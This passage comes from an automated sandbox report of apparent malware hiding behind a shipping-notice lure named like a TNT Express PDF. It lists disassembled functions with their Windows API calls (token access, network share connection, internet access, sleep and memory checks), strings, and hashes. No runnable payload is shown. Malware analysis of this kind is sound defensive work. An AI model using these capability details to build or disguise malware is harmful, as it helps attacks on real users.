Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: b8097f5c6a1577b1f712ce536981d517d0e2885ef5ccdddf86a7919699e0b318
Instruction ID: aaf7d104618ee424fd930fd057818171018089fa9e5e5450219b389a16ae3d4c
Opcode Fuzzy Hash: b8097f5c6a1577b1f712ce536981d517d0e2885ef5ccdddf86a7919699e0b318
Instruction Fuzzy Hash: 45E0657125C744AEDB215B75AC09BE87F21EB11336F048219F6F9540E1C7714640AB10

Function 0092162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00921634
OpenThreadToken.ADVAPI32(00000000,?,?,?,009211D9), ref: 0092163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009211D9), ref: 00921648
OpenProcessToken.ADVAPI32(00000000,?,?,?,009211D9), ref: 0092164F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 1fb7f7348dbbcf6b39a9383db51e128da4cb188fb229cfc2533b51d23960b284
Instruction ID: 8901a2affa579f71771f3545711175813e8ac2c1022f668b5383629585d0d593
Opcode Fuzzy Hash: 1fb7f7348dbbcf6b39a9383db51e128da4cb188fb229cfc2533b51d23960b284
Instruction Fuzzy Hash: CBE04FB1616321AFDB201BB2AD0DB4A3B6CAF54B92F144808F245D9080D7348440D750

Function 0091D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0091D858
GetDC.USER32(00000000), ref: 0091D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0091D882
ReleaseDC.USER32(?), ref: 0091D8A3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e875a00999c79e1e5c34c2882f4844678158d164895f41d5ed761ff3d27df92e
Instruction ID: 244dc9b90f783b5d0c89dd9228f36cb5f0ea58d1b1c64822668adf153092d1e1
Opcode Fuzzy Hash: e875a00999c79e1e5c34c2882f4844678158d164895f41d5ed761ff3d27df92e
Instruction Fuzzy Hash: 8BE01AB0815309DFCF419FA1D80CA6DBBB1FB08312F108449E80AE7250CB389A41EF40

Function 0091D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0091D86C
GetDC.USER32(00000000), ref: 0091D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0091D882
ReleaseDC.USER32(?), ref: 0091D8A3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c7edec8d63dbba76edf23eb43dcb25c6ee7c108fcf725232c1f7be4efba5af07
Instruction ID: 7213489580afe1a6909ed6b74ed523865992eaa65aa715aeff3ef00a0646205c
Opcode Fuzzy Hash: c7edec8d63dbba76edf23eb43dcb25c6ee7c108fcf725232c1f7be4efba5af07
Instruction Fuzzy Hash: F6E01AB0815305DFCF409FA1D80C66DBBB1FB08312B108009E80AE7250CB385A01EF40

Function 00934D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 008C7620: _wcslen.LIBCMT ref: 008C7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00934ED4

Strings

*, xrefs: 00934E10
LPT, xrefs: 00934DFB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: a017ebe5ede3a3fa559144c569f7343f38a7d51a0b65ce435865ce232bab7d72
Instruction ID: cab643f8acaf1c7657ac8e93939b442e79f8d165a1c625c88e56747dbcea779f
Opcode Fuzzy Hash: a017ebe5ede3a3fa559144c569f7343f38a7d51a0b65ce435865ce232bab7d72
Instruction Fuzzy Hash: 49911875A002049FCB14DF58C484EAABBF5BF49304F198099E84A9B3A2D735EE85CF91

Function 008EE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 008EE30D

Strings

pow, xrefs: 008EE2E5, 008EE302

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9234ec9e2ee8e4eaa3ee4d9728746e42a4ed41c7bb2b5a5fabf8b1cdb6f2b9dc
Instruction ID: b1fbdd184dfcfb132cd3c4f59f185395885795b32726481b3e077af576df9d77
Opcode Fuzzy Hash: 9234ec9e2ee8e4eaa3ee4d9728746e42a4ed41c7bb2b5a5fabf8b1cdb6f2b9dc
Instruction Fuzzy Hash: 5D518961A1C64A96EB117B39CD0137A3BA4FB41B40F30496DF1D5C23EDEB318C91AA46

Function 008DE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 008DE1B1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: bbab301c0722d94452cc56a84c76adf16c060c46f0ab8325068a99729d28faff
Instruction ID: aba91ef062d3d9f07d9c93f9ff48bbef7071f723ac2635fe2df8eb7592e0a0c9
Opcode Fuzzy Hash: bbab301c0722d94452cc56a84c76adf16c060c46f0ab8325068a99729d28faff
Instruction Fuzzy Hash: 17512475A0424ADFEB15EF28C481AFA7BA8FF55320F24415AFC91DB2D0D6349D82CB91

Function 008DF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 008DF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 008DF2BB

Strings

@, xrefs: 008DF2AF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f07d4cab410bac3938ba30e37b0a825c928ce417f32c1f3d82ee8ad326d453f4
Instruction ID: 606ba5bc102cd81346bb0657d12100ef8147badd0b35c7195ae1b44743e7ba5c
Opcode Fuzzy Hash: f07d4cab410bac3938ba30e37b0a825c928ce417f32c1f3d82ee8ad326d453f4
Instruction Fuzzy Hash: 8851277241C7449BD320AF18DC86BABBBF8FB84300F81885DF2D981195EB719569CB67

Function 00945745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009457E0
_wcslen.LIBCMT ref: 009457EC

Strings

CALLARGARRAY, xrefs: 009457E6, 009457EB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: ab3d93072186c1e7237870a1513072303e4436937aeea5297a31d327f1abafdd
Instruction ID: 1f0b630e098967a31b8d32e87feb2b50d07e557cba61509233219a3ee39db59f
Opcode Fuzzy Hash: ab3d93072186c1e7237870a1513072303e4436937aeea5297a31d327f1abafdd
Instruction Fuzzy Hash: 6E41AE71E002099FCB14EFA9C881DAEBBF9FF59324F114169E505A7362EB309D81CB90

Function 0093D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0093D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0093D13A

Strings

|, xrefs: 0093D10B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: e09adb1efa14cf1fc9601ca3227f43cad164d58cd9030ee4cf440067a69e3641
Instruction ID: 3030b379ef11165156cbcf73fb4e4b400728c7302b7310819bdb71a75430f9ff
Opcode Fuzzy Hash: e09adb1efa14cf1fc9601ca3227f43cad164d58cd9030ee4cf440067a69e3641
Instruction Fuzzy Hash: BD313971D01209ABCF15EFE5DC95EEE7FB9FF05300F100029E819A6162E731AA16CB51

Function 0095356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00953621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0095365C

Strings

static, xrefs: 009535BC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 5dcbff822db1585d2ce65b8c2bfaefc04dcfd1e699a26bec986dd0e478f0297a
Instruction ID: 3bb5b872715a2b254202df74d0398c7d5c6e3da673ee742be1b076be19a7081f
Opcode Fuzzy Hash: 5dcbff822db1585d2ce65b8c2bfaefc04dcfd1e699a26bec986dd0e478f0297a
Instruction Fuzzy Hash: 2C319C71110604AEDB10DF29D881FBB73A9FF88765F00961DF8A597280DA30AD86D760

Function 00954537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0095461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00954634

Strings

', xrefs: 0095458E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 9fff10e3823a787d1ddb7667f0c47059068a7112ff6e0c750265d9b7064588db
Instruction ID: 22a6099cdbdc602f52ef250c6fe7f373770c27a519b6fae289442baaebfe3b1c
Opcode Fuzzy Hash: 9fff10e3823a787d1ddb7667f0c47059068a7112ff6e0c750265d9b7064588db
Instruction Fuzzy Hash: BA312874A0130A9FDB54CF6AC990BDA7BB9FF09305F10406AED04AB341E770A986CF90

Function 009531EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0095327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00953287

Strings

Combobox, xrefs: 00953249

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 0dada58eb400cac10ec410068466cbb495d671638df5500b7f9f97e990dcf641
Instruction ID: 041b4414861d76d5ae644c2f9666053b837169c5cce7146b7c88c40e9738c012
Opcode Fuzzy Hash: 0dada58eb400cac10ec410068466cbb495d671638df5500b7f9f97e990dcf641
Instruction Fuzzy Hash: 2E11E2713046087FEF21DE96DC80EBB376EEB943A5F108128F928E7290D631DD559760

Function 00953710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 008C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008C604C
Part of subcall function 008C600E: GetStockObject.GDI32(00000011), ref: 008C6060
Part of subcall function 008C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C606A

GetWindowRect.USER32(00000000,?), ref: 0095377A
GetSysColor.USER32(00000012), ref: 00953794

Strings

static, xrefs: 00953757

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 4c895a028e20693829723601d855cd0851e000cba85c738ebb9329c897e42543
Instruction ID: 3c2f5f98e123c04240c15be4d95bd5fbcf5dda31d7a62e553e7f93439190df45
Opcode Fuzzy Hash: 4c895a028e20693829723601d855cd0851e000cba85c738ebb9329c897e42543
Instruction Fuzzy Hash: B91129B2A1020AAFDB00DFA9CC45EEA7BB8FB08355F004915FD55E2250E735E955DB50

Function 0093CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0093CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0093CDA6

Strings

<local>, xrefs: 0093CD66

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 38cf3fece13ebff6f9d3e7e040cc550d490e3ee5e8858fa81323bd83a4c689a1
Instruction ID: 2a9928dadf5d41cdab9f2ac97b8b5d717b48feede8f0beeb4c2762cb29171795
Opcode Fuzzy Hash: 38cf3fece13ebff6f9d3e7e040cc550d490e3ee5e8858fa81323bd83a4c689a1
Instruction Fuzzy Hash: EB11C6F5215A317AD7344B668C45EE7BEACEF127A4F004626B129A71C0D7749840DBF0

Function 00953429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 009534AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009534BA

Strings

edit, xrefs: 0095348F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 28f196d80f6a4abdfd8df622c255a13960cb23f8fbb3ae85227240be26dd724a
Instruction ID: e7024ebe2c39075234f539074cb462dc4f087b78e66636adb54623df9269e2ef
Opcode Fuzzy Hash: 28f196d80f6a4abdfd8df622c255a13960cb23f8fbb3ae85227240be26dd724a
Instruction Fuzzy Hash: DA11BF71100208AFEB118F66EC40ABB376EEB043B9F508724FD61931E0C731DC99A750

Function 00926C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00926CB6
_wcslen.LIBCMT ref: 00926CC2

Strings

STOP, xrefs: 00926CBC, 00926CC1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: f915e9852bfe590b387a3fc4f8e86a17e47813c8f45c9a916fcd0867b918a2f8
Instruction ID: e92e90f7c80c107fa0fa5c1b9e8e24c46c6ae14a1a8e8612ed55a325ef6edae4
Opcode Fuzzy Hash: f915e9852bfe590b387a3fc4f8e86a17e47813c8f45c9a916fcd0867b918a2f8
Instruction Fuzzy Hash: C9010432A0053A8BCB20AFBDEC809BF37B8FB617147000928E9A2D3598EB31D900C650

Function 00921CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 00923CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00923CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00921D4C

Strings

ComboBox, xrefs: 00921CEB
ListBox, xrefs: 00921D16

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 54675a4258413dbb75ae0038c80472f8b630cba0df03ec96f05b8f60cb1a359f
Instruction ID: 0beeadbc56f124a65f0769ba811c866a3cce09056fb0cf87cdec6e9882878ec7
Opcode Fuzzy Hash: 54675a4258413dbb75ae0038c80472f8b630cba0df03ec96f05b8f60cb1a359f
Instruction Fuzzy Hash: 1701D875601224ABCB08EFA4EC55EFE7778FB66350B040919F872973C5EA34991C8761

Function 00921BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 00923CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00923CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00921C46

Strings

ComboBox, xrefs: 00921BE5
ListBox, xrefs: 00921C10

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

